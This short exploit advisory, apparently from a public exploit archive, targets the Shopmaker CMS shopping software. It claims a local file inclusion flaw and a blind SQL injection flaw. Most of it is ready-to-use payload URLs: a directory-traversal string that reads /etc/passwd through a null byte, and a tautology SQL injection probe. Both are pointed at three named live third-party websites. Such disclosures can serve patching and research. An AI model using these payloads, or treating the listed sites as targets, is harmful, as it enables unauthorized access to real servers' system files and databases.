Shopmaker CMS suffers from local file inclusion and remote SQL injection vulnerabilities.
5de8439a2e3ae43839e67b05f87e41558f69afc547d3131ca543ed38c69e12fc
Shopmaker CMS (bSQL/LFI) Multiple Remote Vulnerabilities
==============================================================================
Software : Shopmaker Asp
Vendor : http://www.shopmaker.dk/
Author : Platen * mail: platen.secure[at]gmail.com
web : Blog = Www.platen.gigfa.com ~ Www.pentesters.IR
Greetings: b3hz4d ~ Cru3l.b0y ~ Cdef3nder ~ Snake and all members in Pentesters.ir
==============================================================================
[LFI]
http://127.1.1.7/mod.php?mod=[LFI]
--------------------------------------------------------------------------
[BLIND SQL INJECTION ]
http://www.nordisc.com:80/mod.php?mod=userpage&menu=130105&page_id=[BLIND]
--------------------------------------------------------------------------
exp:
lfi ~~~~~~> http://www.nordisc.com/mod.php?mod=../../../../../../../../../../etc/passwd%00
http://www.amtbiopharma.com/mod.php?mod=../../../../../../../../../../etc/passwd%00
http://www.verkkopaita.com/mod.php?mod=../../../../../../../../../../etc/passwd%00
--------------------------------------------------------------------------
exp:
BLND ~~~~~~> http://www.nordisc.com:80/mod.php?mod=userpage&menu=130105&page_id=145'+and+31337-31337=0+--+
http://www.amtbiopharma.com/mod.php?mod=userpage&menu=130105&page_id=145'+and+31337-31337=0+--+
http://www.verkkopaita.com/mod.php?mod=userpage&menu=130105&page_id=145'+and+31337-31337=0+--+